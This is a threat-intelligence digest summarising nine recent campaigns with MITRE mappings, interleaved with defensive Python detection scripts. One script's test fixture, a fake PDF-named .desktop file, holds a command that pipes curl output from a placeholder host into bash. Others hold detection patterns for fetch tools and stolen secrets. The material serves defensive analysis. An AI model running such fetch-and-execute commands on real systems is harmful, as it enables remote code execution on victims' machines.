
Anomali Cyber Watch: PromptLock Ransomware, Blind Eagle, Lovable Website Attacks, and More

Anomali Threat Research
September 2, 2025

PromptLock Ransomware Uses AI-Generated Lua to Encrypt and Steal Data

(published: August 28, 2025)

ESET researchers have uncovered PromptLock, the first known ransomware to integrate large language model output into its operations. Written in Go and uploaded to VirusTotal as a proof of concept, the malware queries the gpt-oss:20b model through the Ollama API to dynamically generate Lua scripts for file discovery, exfiltration, and encryption. This introduces non-determinism into execution, complicating detection. The ransomware implements the lightweight SPECK-128 cipher and targets Windows, macOS, and Linux. Analysts note unfinished features, including a placeholder Bitcoin address linked to Satoshi Nakamoto and an inactive wipe function, suggesting an experimental build rather than an active campaign.

Analyst Comment: What stands out with PromptLock is how it uses an LLM to change its code each time it runs. We’ve seen similar tricks before with polymorphic malware and fileless techniques, but here the model does the heavy lifting. That makes the process faster and easier, which puts more pressure on defenders to focus less on static signatures and more on behavior and anomalies. ESET notes that PromptLock has not been seen in their telemetry but was instead discovered on VirusTotal, leading them to conclude it is a proof-of-concept or work in progress rather than an active ransomware campaign.

Blind Eagle’s Five Clusters Target Colombian Government with Cracked RATs and Dynamic DNS

(published: August 28, 2025)

Recorded Future identified five related activity clusters tied to Blind Eagle, active from May 2024 through July 2025, with nearly 60% of observed activity hitting Colombian government entities. The campaigns used spearphishing that impersonated local agencies, URL shorteners, geofencing, and compromised email accounts to steer only in-region victims to attacker infrastructure. Delivery chained VBS and PowerShell to stage cracked commodity RATs such as AsyncRAT, DcRAT, Remcos, LimeRAT, and XWorm from legitimate services including Discord, Paste.ee, Internet Archive, Bitbucket, and Google Drive. Command infrastructure mixed Colombian ISP ranges with VPS or VPN hosts and relied on dynamic DNS providers such as DuckDNS and No-IP, reflecting simple but effective methods applied consistently across the clusters. Background research confirms Blind Eagle has targeted South America since at least 2018 across government and financial sectors.

Analyst Comment: Blind Eagle’s use of dynamic DNS stands out because it provides them resilience without investment. By leaning on services like DuckDNS and No-IP, they can swap out backend infrastructure quickly while keeping the same hostnames active. It is a simple tactic, but when paired with commodity RATs and free staging services, it gives the operation a kind of staying power that far outweighs the technical effort involved.

MITRE ATT&CK: T1566.001 - Phishing: Spearphishing Attachment | T1566.002 - Phishing: Spearphishing Link | T1586.002 - Compromise Accounts: Email Accounts | T1059.005 - Command and Scripting Interpreter: Visual Basic | T1059.001 - Command and Scripting Interpreter: PowerShell | T1588.001 - Obtain Capabilities: Malware | T1608.001 - Stage Capabilities: Upload Malware | T1568 - Dynamic Resolution | T1105 - Ingress Tool Transfer
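The detection angle on the chain above (script interpreters fetching from free staging services, followed by resolution of dynamic-DNS names) can be reduced to a small triage pass over DNS or proxy telemetry. The script below is an added example, not code from Recorded Future or Anomali; the record layout, the sample lines and the provider lists are constructed for the illustration, and the dynamic-DNS suffixes beyond DuckDNS and No-IP are assumed additions.

```python
"""Triage DNS/proxy records for dynamic-DNS C2 names and script-host staging fetches.

Added example (not Recorded Future or Anomali code). The log layout, the sample
lines and the provider lists below are constructed; extend them from your own
telemetry.
"""
import re
from collections import defaultdict

# Dynamic DNS parent domains. DuckDNS and No-IP are named in the write-up;
# the others are assumed common additions.
DYNAMIC_DNS_SUFFIXES = ("duckdns.org", "no-ip.org", "no-ip.com", "ddns.net", "hopto.org")

# Legitimate services the clusters used to stage RATs. A browser visiting them
# is normal; a script interpreter fetching from them is the signal.
STAGING_HOSTS = ("cdn.discordapp.com", "paste.ee", "archive.org",
                 "bitbucket.org", "drive.google.com")

SCRIPT_INTERPRETERS = ("powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe")

# Constructed record layout: <utc timestamp> <source ip> <process image> <queried host>
LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<src>\S+)\s+(?P<proc>\S+)\s+(?P<host>\S+)$")

SAMPLE_LOG = """\
2025-06-12T09:14:03Z 10.20.1.7 chrome.exe drive.google.com
2025-06-12T09:14:09Z 10.20.1.7 wscript.exe paste.ee
2025-06-12T09:14:11Z 10.20.1.7 powershell.exe cdn.discordapp.com
2025-06-12T09:14:40Z 10.20.1.7 powershell.exe update-colombia.duckdns.org
2025-06-12T09:15:02Z 10.20.1.9 chrome.exe bitbucket.org
2025-06-12T09:16:30Z 10.20.1.11 svchost.exe minsalud-portal.no-ip.org
"""


def host_under(host, suffixes):
    """True when host equals one of the suffixes or is a subdomain of it
    (so 'duckdns.org.attacker.test' does not match)."""
    host = host.lower().rstrip(".")
    return any(host == s or host.endswith("." + s) for s in suffixes)


def triage(log_text):
    """Return findings as (source_ip, category, host, process) tuples."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # skip malformed lines rather than abort the run
        src, proc, host = m["src"], m["proc"].lower(), m["host"]
        if host_under(host, DYNAMIC_DNS_SUFFIXES):
            findings.append((src, "dynamic-dns", host, proc))
        if proc in SCRIPT_INTERPRETERS and host_under(host, STAGING_HOSTS):
            findings.append((src, "staging-by-script-host", host, proc))
    return findings


def score_sources(findings):
    """Collapse findings per source: 'high' when a script host fetched from a
    staging service AND the same source resolved a dynamic-DNS name (the chain
    described for Blind Eagle); 'medium' when only one of the two is present."""
    categories = defaultdict(set)
    for src, category, _host, _proc in findings:
        categories[src].add(category)
    return {src: ("high" if len(c) == 2 else "medium") for src, c in categories.items()}


if __name__ == "__main__":
    hits = triage(SAMPLE_LOG)
    for hit in hits:
        print("%-12s %-24s %-32s %s" % hit)
    print(score_sources(hits))
```

On the constructed sample, 10.20.1.7 scores high because wscript.exe and powershell.exe pulled from Paste.ee and Discord and then resolved a DuckDNS name, while the browser visits to Google Drive and Bitbucket from other hosts produce nothing; that separation is the point of keying the staging rule on the process image.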

FBI Warning: QR Codes in Unsolicited Packages Could Be Scam

(published: August 17, 2025)

The FBI issued a Public Service Announcement warning that criminals are sending unsolicited packages containing QR codes. When recipients scan these codes, they may be directed to phishing sites asking for personal or financial information or unwittingly download malware onto their smartphones. The scam is a variation of “brushing” schemes, packages sent without sender information to entice curiosity and prompt scanning. The FBI advises against scanning QR codes from unknown sources, recommends reviewing app permissions carefully, and urges anyone suspecting they’ve been targeted to report the incident to the Internet Crime Complaint Center (IC3).

Analyst Comment: People in security have long understood the risks of QR codes, but I am not sure the same is true for the general public, especially as the FBI now feels the need to issue a warning. Walking through my area I see QR codes everywhere, on lamp posts, posters, and menus, and it is easy to forget they can lead anywhere. It also takes little effort for an attacker to place a malicious code over a legitimate one, redirecting someone to a cloned site. Take the time to talk with family and friends so they understand the risk; collective awareness is what reduces the likelihood of these scams working.

MITRE ATT&CK: T1660 - Phishing | T1566.002 - Phishing: Spearphishing Link | T1598 - Phishing For Information

UNC6384 Uses Captive Portals to Deploy PlugX Against Diplomats

(published: August 28, 2025)

Google has linked a Chinese state-aligned group, UNC6384, to a campaign targeting diplomats in Southeast Asia. The attackers hijacked Wi-Fi captive portal checks, redirecting users to a fake update page secured with a valid certificate. From there, victims unknowingly downloaded a signed installer that used DLL sideloading to run a variant of the PlugX backdoor (also known as SOGU.SEC). This technique gave attackers covert remote access and persistence, while overlaps with Mustang Panda suggest shared tooling. Google has added detections to Safe Browsing and notified affected users.

Analyst Comment: A notable thread in this campaign is the repeated use of certificates issued to Chengdu Nuoxin Times Technology Co., Ltd. The STATICPLUGIN downloader was signed with a valid GlobalSign certificate, and more than two dozen other malicious binaries linked to China-nexus groups have carried Chengdu signatures since at least January 2023. In this case, the certificate was created in May 2025 and expired in July, suggesting a pattern of short-lived but recurring use. It is still unclear whether these certificates are stolen, misused, or deliberately supplied, but their continued presence may provide a useful pivot point for tracking related operations.

MITRE ATT&CK: T1598 - Phishing For Information | T1566.001 - Phishing: Spearphishing Attachment | T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking | T1553.002 - Subvert Trust Controls: Code Signing | T1218.007 - Signed Binary Proxy Execution: Msiexec | T1071.001 - Application Layer Protocol: Web Protocols
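The pivot the analyst comment describes, tracking a signer subject that keeps reappearing on short-lived certificates, is a grouping exercise over a corpus of signed binaries. The script below is an added example and not code from Google, Mandiant or Anomali. Its records are constructed: the hashes, serial numbers and all issuers other than GlobalSign are placeholders, and the dates are chosen to match the windows described (a certificate created in May 2025 that expired in July, and Chengdu-signed samples going back to January 2023).

```python
"""Pivot a corpus of signed binaries on the certificate subject.

Added example (not Google/Mandiant or Anomali code). Records are constructed;
hashes, serials and non-GlobalSign issuers are placeholders.
"""
from collections import defaultdict
from datetime import date

CHENGDU = "Chengdu Nuoxin Times Technology Co., Ltd."

SIGNED_BINARIES = [
    {"sha256": "<placeholder-hash-1>", "signer": CHENGDU, "issuer": "GlobalSign",
     "serial": "<serial-A>", "not_before": "2025-05-05", "not_after": "2025-07-05",
     "label": "STATICPLUGIN"},
    {"sha256": "<placeholder-hash-2>", "signer": CHENGDU, "issuer": "GlobalSign",
     "serial": "<serial-A>", "not_before": "2025-05-05", "not_after": "2025-07-05",
     "label": "PlugX loader"},
    {"sha256": "<placeholder-hash-3>", "signer": CHENGDU, "issuer": "<issuer-placeholder>",
     "serial": "<serial-B>", "not_before": "2023-01-10", "not_after": "2023-04-10",
     "label": "<unattributed>"},
    {"sha256": "<placeholder-hash-4>", "signer": "Example Software GmbH", "issuer": "<issuer-placeholder>",
     "serial": "<serial-C>", "not_before": "2023-01-01", "not_after": "2026-01-01",
     "label": "benign installer"},
]


def validity_days(rec):
    """Length of the certificate's validity window in days."""
    return (date.fromisoformat(rec["not_after"]) - date.fromisoformat(rec["not_before"])).days


def pivot_by_signer(records, max_validity_days=120, min_certs=2):
    """Group by signer subject. A subject that repeatedly obtains short-lived
    certificates and signs several samples with them is the recurring pattern
    worth tracking; one long-lived certificate is ordinary vendor behaviour."""
    groups = defaultdict(lambda: {"binaries": 0, "validity": {}, "labels": set()})
    for rec in records:
        g = groups[rec["signer"]]
        g["binaries"] += 1
        g["validity"][rec["serial"]] = validity_days(rec)  # one entry per certificate
        g["labels"].add(rec["label"])
    report = {}
    for signer, g in groups.items():
        short = [d for d in g["validity"].values() if d <= max_validity_days]
        report[signer] = {
            "binaries": g["binaries"],
            "certificates": len(g["validity"]),
            "validity_days": sorted(g["validity"].values()),
            "short_lived_recurring": len(short) >= min_certs,
            "labels": sorted(g["labels"]),
        }
    return report


def related_hashes(records, signer):
    """Everything signed by the subject: the pivot set to hunt for in telemetry."""
    return [r["sha256"] for r in records if r["signer"] == signer]


if __name__ == "__main__":
    for signer, summary in pivot_by_signer(SIGNED_BINARIES).items():
        print(signer, summary)
    print(related_hashes(SIGNED_BINARIES, CHENGDU))
```

The 120-day threshold is an assumption chosen so that the May-to-July window (61 days) and a three-month certificate both count as short-lived while a multi-year vendor certificate does not; tune it to what your own corpus shows.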

Coordinated Scans Target Microsoft RDP Authentication Portals

(published: August 28, 2025)

GreyNoise observed a sharp jump in uniform scanning against Microsoft Remote Desktop authentication surfaces, first with 1,971 IPs on August 21 and then a larger wave exceeding 30,000 IPs on August 24. The probes hit both RD Web Access and the RDP Web Client in tandem, sharing a near-identical client signature and focusing on timing differences in login workflows to confirm valid usernames. Roughly 92% of the clustered IPs had prior malicious classification, with sources skewing to Brazil and targets concentrated in the United States. GreyNoise notes that pre-disclosure spikes like this often precede new CVEs within about six weeks, raising the risk of follow-on credential stuffing or password spraying if usernames are successfully enumerated.

Analyst Comment: The sudden jump to tens of thousands of IPs, all sharing the same client signature and hitting the same portals, reflects coordination, not noise. GreyNoise has seen this type of surge before new RDP vulnerabilities become public, which makes the timing important. Even if no new CVE emerges, large-scale username enumeration still enables credential attacks later. Now is the time to check remote desktop exposure, enforce strong authentication, and monitor for abnormal login activity before these probes shift into active exploitation.

MITRE ATT&CK: T1595 - Active Scanning | T1087 - Account Discovery | T1110.003 - Brute Force: Password Spraying | T1110.004 - Brute Force: Credential Stuffing
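The coordination signal GreyNoise describes, many source addresses sharing one client signature and hitting both RD Web portals in a short span, is straightforward to surface from the web server's own logs. The script below is an added example, not GreyNoise's or Anomali's code. The log layout and all traffic are constructed; the two portal paths are the default IIS locations for RD Web Access and the RDP Web Client and are an assumption to adjust to your deployment.

```python
"""Detect coordinated probing of RD Web Access and the RDP Web Client.

Added example (not GreyNoise or Anomali code). Log layout, portal paths and
the sample traffic are constructed/assumed.
"""
import re
from collections import defaultdict
from datetime import datetime

# Portal paths to watch (assumed defaults).
PORTAL_PATHS = {
    "/RDWeb/Pages/en-US/login.aspx": "rd-web-access",
    "/RDWeb/webclient/": "rdp-web-client",
}

# Constructed line layout: <utc ts> <client ip> "<method> <path>" <status> "<user agent>"
LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<ip>\S+) "(?P<method>[A-Z]+) (?P<path>\S+)" (?P<status>\d{3}) "(?P<ua>[^"]*)"$'
)

SCANNER_UA = "constructed-scanner-signature/1.0"   # stands in for the shared client signature
BROWSER_UA = "Mozilla/5.0 (Windows NT 10.0) constructed-browser"


def build_sample_log():
    """Constructed traffic: one employee login, then 30 sources sharing a user
    agent that hit both portals inside the same ten-minute window."""
    lines = [f'2025-08-24T03:00:05Z 203.0.113.10 "GET /RDWeb/Pages/en-US/login.aspx" 200 "{BROWSER_UA}"']
    for i in range(30):
        ip = f"198.51.100.{i + 1}"
        ts = f"2025-08-24T03:0{i % 10}:{10 + i:02d}Z"
        lines.append(f'{ts} {ip} "POST /RDWeb/Pages/en-US/login.aspx" 200 "{SCANNER_UA}"')
        lines.append(f'{ts} {ip} "GET /RDWeb/webclient/" 200 "{SCANNER_UA}"')
    return lines


def parse(lines):
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()


def window_of(ts, minutes=10):
    """Fixed time bucket so requests from many sources can be counted together."""
    epoch = datetime.fromisoformat(ts.replace("Z", "+00:00")).timestamp()
    return int(epoch) // (minutes * 60)


def detect_surges(lines, min_distinct_ips=20):
    """Group portal requests by (user agent, window) and alert when the number
    of distinct source IPs in one window reaches min_distinct_ips. One client
    signature spread over many addresses and touching both portals is the
    coordination pattern described above."""
    windows = defaultdict(lambda: {"ips": set(), "portals": set()})
    for r in parse(lines):
        portal = PORTAL_PATHS.get(r["path"])
        if portal is None:
            continue
        w = windows[(r["ua"], window_of(r["ts"]))]
        w["ips"].add(r["ip"])
        w["portals"].add(portal)
    alerts = []
    for (ua, bucket), w in windows.items():
        if len(w["ips"]) >= min_distinct_ips:
            alerts.append({"user_agent": ua, "window": bucket,
                           "distinct_ips": len(w["ips"]),
                           "both_portals": len(w["portals"]) == len(PORTAL_PATHS)})
    return alerts


if __name__ == "__main__":
    for alert in detect_surges(build_sample_log()):
        print(alert)
```

Counting distinct IPs per user agent rather than requests per IP is deliberate: enumeration spread across thousands of low-rate sources never trips a per-IP threshold, but the shared signature still concentrates in one bucket. The threshold of 20 is an assumption; set it from a baseline of your normal portal traffic.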

Transparent Tribe Uses Weaponized .desktop Files to Target Indian Government

(published: August 25, 2025)

Transparent Tribe, also known as APT36, is running a phishing campaign against Indian government and defense organizations by disguising Linux “.desktop” shortcut files as PDF documents. When opened, the files execute a shell script that installs a payload and displays a decoy document to mask the activity. Researchers note persistence through cron jobs and systemd services, alongside concurrent Windows targeting. The campaign reflects the group’s long-running focus on Indian government networks and overlaps with SideCopy-linked efforts to compromise multi-factor authentication workflows.

Analyst Comment: What caught my eye in this campaign is how the attackers use a real document on Google Drive to keep the victim comfortable while the payload installs in the background, almost like a sleight-of-hand trick. Splitting persistence between cron and systemd feels like a safeguard learned through experience, ensuring the foothold survives even if one method is spotted. Tactics like these rarely stay confined to one environment; once they prove effective, they tend to surface elsewhere with only minor adjustments. Hunt.io’s analysis also points to deployment of Poseidon, a Transparent Tribe backdoor with a history of supporting data collection, credential theft, and long-term access.

MITRE ATT&CK: T1583.001 - Acquire Infrastructure: Domains | T1566.001 - Phishing: Spearphishing Attachment | T1204.002 - User Execution: Malicious File | T1059.004 - Command and Scripting Interpreter: Unix Shell | T1053.003 - Scheduled Task/Job: Cron | T1543.002 - Create or Modify System Process: Systemd Service | T1036.007 - Masquerading: Double File Extension | T1036.005 - Masquerading: Match Legitimate Name Or Location | T1027 - Obfuscated Files Or Information | T1140 - Deobfuscate/Decode Files Or Information | T1622 - Debugger Evasion | T1497 - Virtualization/Sandbox Evasion | T1082 - System Information Discovery | T1105 - Ingress Tool Transfer | T1571 - Non-Standard Port | T1111 - Two-Factor Authentication Interception | T1041 - Exfiltration Over C2 Channel
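A .desktop launcher is a plain key/value file, so the disguise described above (document name and icon, a shell interpreter in Exec, a download, a decoy opened afterwards) can be scored directly from its fields. The analyzer below is an added example and not code from Hunt.io or Anomali. Both sample entries are constructed; the host placeholder.invalid is a reserved test name, and the keyword lists are assumptions to extend.

```python
"""Score Linux .desktop launchers that masquerade as documents.

Added example (not Hunt.io or Anomali code). Both samples are constructed;
placeholder.invalid is a reserved name that never resolves.
"""
import configparser
import re
import shlex

DOC_EXTENSIONS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx")
SHELLS = {"sh", "bash", "dash", "zsh", "python", "python3", "perl"}
FETCH_RE = re.compile(r"\b(curl|wget)\b")
VIEWER_RE = re.compile(r"\b(xdg-open|evince|okular|libreoffice)\b")

MALICIOUS_SAMPLE = """\
[Desktop Entry]
Type=Application
Name=Defence_Circular_2025.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "curl -s http://placeholder.invalid/stage.sh | bash; xdg-open /tmp/decoy.pdf"
"""

BENIGN_SAMPLE = """\
[Desktop Entry]
Type=Application
Name=Quarterly Report
Icon=application-pdf
Exec=xdg-open /home/analyst/Documents/quarterly-report.pdf
"""


def parse_desktop_entry(text):
    """Return the [Desktop Entry] group as a dict with case preserved."""
    cp = configparser.ConfigParser(interpolation=None, delimiters=("=",))
    cp.optionxform = str  # keep Exec/Name capitalisation
    cp.read_string(text)
    return dict(cp["Desktop Entry"]) if cp.has_section("Desktop Entry") else {}


def analyze_desktop_entry(text):
    """Return {'reasons': [...], 'score': int, 'verdict': str}."""
    entry = parse_desktop_entry(text)
    name = entry.get("Name", "").lower()
    icon = entry.get("Icon", "").lower()
    exec_line = entry.get("Exec", "")
    try:
        argv = shlex.split(exec_line)
    except ValueError:  # unbalanced quotes: fall back to a crude split
        argv = exec_line.split()
    reasons = []
    if name.endswith(DOC_EXTENSIONS):
        reasons.append("document-name")
    if "pdf" in icon or "document" in icon:
        reasons.append("document-icon")
    shell = bool(argv) and argv[0].rsplit("/", 1)[-1] in SHELLS
    if shell:
        reasons.append("shell-interpreter")
        if FETCH_RE.search(exec_line):
            reasons.append("network-fetch")
        if entry.get("Terminal", "false").lower() == "false":  # spec default is false
            reasons.append("hidden-terminal")
        if VIEWER_RE.search(exec_line):
            reasons.append("decoy-open")
    disguised = "document-name" in reasons or "document-icon" in reasons
    verdict = "suspicious" if shell and disguised else ("review" if shell else "benign")
    return {"reasons": reasons, "score": len(reasons), "verdict": verdict}


def scan_files(paths):
    """Analyze .desktop files on disk; returns {path: result}."""
    results = {}
    for path in paths:
        with open(path, encoding="utf-8", errors="replace") as fh:
            results[path] = analyze_desktop_entry(fh.read())
    return results


if __name__ == "__main__":
    for label, sample in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, analyze_desktop_entry(sample))
```

The benign sample keeps a PDF icon and still comes out clean because the verdict requires a shell interpreter together with the document disguise; a viewer launched directly is what a real document shortcut looks like. Point scan_files at a user's Desktop and Downloads directories, or at an archive of mail attachments, to apply it in bulk.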

AI Website Builder ‘Lovable’ Abused to Scale Phishing, Malware, and Fraud

(published: August 29, 2025)

Proofpoint researchers revealed that cybercriminals are exploiting Lovable, an AI website builder, to generate phishing sites, fraud pages, and malware delivery infrastructure at scale. The platform offers free hosting on the lovable.app domain, remixable templates, and automated design features that make it easy to launch convincing pages without coding skills. Since February 2025, Proofpoint has tracked tens of thousands of such URLs each month, spread through both email and SMS lures. Attackers have been observed using CAPTCHA gates, adversary-in-the-middle kits, and Telegram bots for credential theft. In June 2025, researchers demonstrated how Lovable could be used to create functional phishing sites with realistic backend logic and manipulative language in just one or two prompts, underscoring the risk of AI-driven abuse. Lovable has stated that security updates are being deployed to mitigate this misuse.

Analyst Comment: Lovable’s problem is the absence of guardrails. Where platforms like ChatGPT block malicious code or manipulative text, Lovable will generate it freely. That single difference may explain why threat actors are leaning on it, as the barrier to entry all but disappears. Creating phishing sites with backend logic and convincing language no longer requires skill or effort, which lowers the cognitive load and makes large-scale abuse much easier. Defenders can spot Lovable abuse by watching for *.lovable.app subdomains, the “Edit with Lovable” badge on free sites, or custom domains resolving to Lovable’s hosting IP. Certificate Transparency logs and fingerprinting of Lovable’s site templates provide further leads when attackers mask activity behind their own domains.

MITRE ATT&CK: T1583.006 - Acquire Infrastructure: Web Services | T1588.002 - Obtain Capabilities: Tool | T1608.005 - Stage Capabilities: Link Target | T1566.002 - Phishing: Spearphishing Link | T1566.003 - Phishing: Spearphishing Via Service | T1204.001 - User Execution: Malicious Link | T1056.003 - Input Capture: Web Portal Capture | T1111 - Two-Factor Authentication Interception | T1539 - Steal Web Session Cookie | T1656 - Impersonation | T1567 - Exfiltration Over Web Service
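The indicators the analyst comment lists (a *.lovable.app subdomain, a custom domain resolving to Lovable's hosting address, the "Edit with Lovable" badge, and Certificate Transparency names) can be applied to a batch of lure URLs in a few lines. The script below is an added example, not Proofpoint's or Anomali's code. The URLs, resolver answers, page bodies and the hosting address 192.0.2.10 (a documentation-range placeholder) are constructed; the badge text is the indicator named above, and the brand keyword list is an assumption.

```python
"""Classify lure URLs and CT log names for signs of Lovable-hosted infrastructure.

Added example (not Proofpoint or Anomali code). DNS answers, page bodies and
the hosting IP below are constructed placeholders.
"""
from urllib.parse import urlsplit

LOVABLE_SUFFIX = "lovable.app"
LOVABLE_HOSTING_IPS = {"192.0.2.10"}   # placeholder for Lovable's hosting address
BADGE_MARKER = "edit with lovable"     # badge text from the analysis, matched case-insensitively
BRAND_KEYWORDS = ("login", "docusign", "microsoft", "invoice", "verify")  # assumed list

# Constructed resolver answers and fetched page bodies, keyed by host.
DNS = {
    "secure-docusign-review.lovable.app": "192.0.2.10",
    "invoice-portal.example.test": "192.0.2.10",
    "lovable.app.attacker.test": "203.0.113.5",
    "www.example.org": "198.51.100.7",
}
PAGES = {
    "invoice-portal.example.test": "<html><body>Sign in <a>Edit with Lovable</a></body></html>",
    "www.example.org": "<html><body>Example Domain</body></html>",
}

LURE_URLS = [
    "https://secure-docusign-review.lovable.app/login",
    "https://invoice-portal.example.test/",
    "https://lovable.app.attacker.test/",
    "https://www.example.org/",
]


def is_lovable_subdomain(host):
    """Registrable-suffix match: 'lovable.app.attacker.test' must not count."""
    host = host.lower().rstrip(".")
    return host == LOVABLE_SUFFIX or host.endswith("." + LOVABLE_SUFFIX)


def classify(url, dns=DNS, pages=PAGES):
    """Return indicator names for one URL, in evaluation order."""
    host = (urlsplit(url).hostname or "").lower()
    reasons = []
    if is_lovable_subdomain(host):
        reasons.append("lovable-subdomain")
    elif dns.get(host) in LOVABLE_HOSTING_IPS:
        reasons.append("resolves-to-lovable-host")  # custom domain fronting Lovable hosting
    if BADGE_MARKER in pages.get(host, "").lower():
        reasons.append("lovable-badge")
    return reasons


def triage(urls):
    return {u: classify(u) for u in urls}


def ct_watch(ct_names, keywords=BRAND_KEYWORDS):
    """Filter Certificate Transparency names down to Lovable subdomains whose
    label carries a brand or credential keyword; a cheap early-warning feed."""
    return [n for n in ct_names
            if is_lovable_subdomain(n) and any(k in n.lower() for k in keywords)]


if __name__ == "__main__":
    for url, reasons in triage(LURE_URLS).items():
        print(url, reasons)
    print(ct_watch(["secure-docusign-review.lovable.app", "my-portfolio.lovable.app",
                    "verify-account.lovable.app"]))
```

The third URL is included on purpose: "lovable.app" appears in the hostname but not as its suffix, and a naive substring check would flag it while missing nothing real. In production, replace the DNS and PAGES dictionaries with live resolution and fetches from a sandboxed egress, since the lure pages themselves are hostile.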

TamperedChef Infostealer Poses as Free PDF Editors in Google Ads

(published: August 29, 2025)

Researchers have uncovered “TamperedChef,” a malvertising campaign where attackers purchased Google Ads to push fake “AppSuite PDF Editor” installers. By exploiting ad placement, the malicious download appeared higher in search results and gained a veneer of legitimacy. Once installed, the loader contacts productivity-tools[.]ai and appsuites[.]ai, establishes persistence, and activates an infostealer that terminates browsers, extracts saved credentials, and exfiltrates cookies. Truesec links the activity back to June 26, with malicious features enabled only after August 21, highlighting a deliberate seeding strategy.

Analyst Comment: I’m seeing a clear rise in infostealers being pushed through campaigns like this, and TamperedChef fits the pattern. What really stands out is the use of Google Ads, which gave the fake editor a higher billing in search results and made it appear more reputable. The delayed activation is another detail worth noting. By letting the program sit quietly before turning malicious, the attackers sidestepped early suspicion and built user trust. Both tactics are becoming more common, and together they make infostealers harder to catch early.

MITRE ATT&CK: T1566.002 - Phishing: Spearphishing Link | T1059 - Command And Scripting Interpreter | T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | T1027 - Obfuscated Files Or Information | T1036 - Masquerading | T1555 - Credentials From Password Stores | T1041 - Exfiltration Over C2 Channel

Google: Salesloft OAuth Breach Expanded Beyond Salesforce Integrations

(published: August 29, 2025)

Google and Mandiant report that actor UNC6395 used stolen OAuth and refresh tokens tied to the Salesloft Drift app to authenticate to customer Salesforce instances between August 8 and 18, 2025, exfiltrating large data sets and mining them for secrets such as AWS access keys, passwords, and Snowflake tokens. Google now says the compromise was not limited to Salesforce; attackers also accessed email for a very small number of Google Workspace accounts via the Drift Email integration on August 9. In response, affected tokens were revoked, the Drift Email integration to Workspace was disabled, and Salesforce temporarily disabled Salesloft integrations while investigations continue. Google states there is no compromise of Google Workspace or Alphabet itself.

Analyst Comment: The key detail here is that stolen OAuth tokens gave attackers direct, trusted access without needing to bypass MFA or trick users. According to Google and Mandiant, all Salesloft Drift customers should treat any and all authentication tokens stored in or connected to the Drift platform as potentially compromised.

MITRE ATT&CK: T1199 - Trusted Relationship | T1078.004 - Valid Accounts: Cloud Accounts | T1528 - Steal Application Access Token | T1550.001 - Use Alternate Authentication Material: Application Access Token | T1213 - Data From Information Repositories | T1114.002 - Email Collection: Remote Email Collection | T1567 - Exfiltration Over Web Service | T1090.003 - Proxy: Multi-Hop Proxy
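Because the attackers mined the exported records for credentials, the defender's counterpart is to run the same search over your own Salesforce export and rotate whatever turns up. The scanner below is an added example, not code from Google, Mandiant or Anomali. Its records are constructed; AKIAIOSFODNN7EXAMPLE is the public AWS documentation sample key, the AWS key and JWT shapes are real formats, and the Snowflake rule is a keyword heuristic because the report gives no token format.

```python
"""Scan exported CRM records for embedded secrets that need rotation.

Added example (not Google/Mandiant or Anomali code). Records are constructed;
the Snowflake rule is a heuristic assumption.
"""
import re
from collections import Counter

PATTERNS = {
    # Real AWS access key ID format: AKIA/ASIA prefix plus 16 upper-case alphanumerics.
    "aws-access-key-id": re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
    # Password handed over in free text.
    "password": re.compile(r"(?i)\b(?:password|passwd|pwd)\s*[:=]\s*(\S+)"),
    # Heuristic: 'snowflake' within 40 characters of 'token' and a value.
    "snowflake-token-heuristic": re.compile(r"(?i)snowflake.{0,40}?token\s*[:=]\s*(\S+)"),
    # Three base64url segments starting with 'eyJ': the JWT/bearer-token shape.
    "jwt": re.compile(r"\beyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\b"),
}

RECORDS = [  # constructed support-case bodies
    {"id": "00Q-0001", "body": "Customer pasted their config: aws_access_key_id = AKIAIOSFODNN7EXAMPLE"},
    {"id": "00Q-0002", "body": "Temporary login for the demo tenant, password: Summer2025! please change"},
    {"id": "00Q-0003", "body": "ETL job uses Snowflake token: sf-constructed-token-abc123 until Friday"},
    {"id": "00Q-0004", "body": "Renewal call notes, no issues raised."},
]


def redact(value):
    """Keep a short prefix so the owner can recognise the secret without exposing it."""
    return value[:4] + "*" * max(len(value) - 4, 0)


def scan_record(record):
    findings = []
    for kind, rx in PATTERNS.items():
        for m in rx.finditer(record["body"]):
            secret = m.group(1) if m.groups() else m.group(0)
            findings.append({"record": record["id"], "type": kind, "preview": redact(secret)})
    return findings


def scan_records(records):
    return [f for r in records for f in scan_record(r)]


def rotation_summary(findings):
    """Counts per secret type: what to rotate first and who to notify."""
    return dict(Counter(f["type"] for f in findings))


if __name__ == "__main__":
    hits = scan_records(RECORDS)
    for hit in hits:
        print(hit)
    print(rotation_summary(hits))
```

Run it against the full export rather than only the objects you think hold secrets; the report's point is that credentials ended up in ordinary case and opportunity text. Treat every hit as compromised and rotate it, since the attacker had the same data for more than a week.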

Storm-0501 Shifts to Cloud-First Ransomware and Extortion

(published: August 29, 2025)

Microsoft reports that financially motivated actor Storm-0501 is moving away from endpoint encryption toward cloud-based impact. The group pivots from on-prem Active Directory into Microsoft Entra ID via Entra Connect Sync servers, finds a Global Administrator account without MFA, then elevates privileges to take control of Azure. They exfiltrate data with AzCopy, delete storage accounts and backups, and when immutability blocks deletion, they encrypt cloud data using new Azure Key Vault keys before issuing ransom demands, sometimes through Microsoft Teams.

Analyst Comment: Storm-0501’s shift shows how ransomware could be changing from traditional endpoint encryption toward cloud-native impact. By abusing Azure controls to delete, encrypt, and extort without deploying a binary, they reduce opportunities for detection. As endpoint defenses improve, other groups may follow this path, making cloud environments a new frontline for ransomware operations.

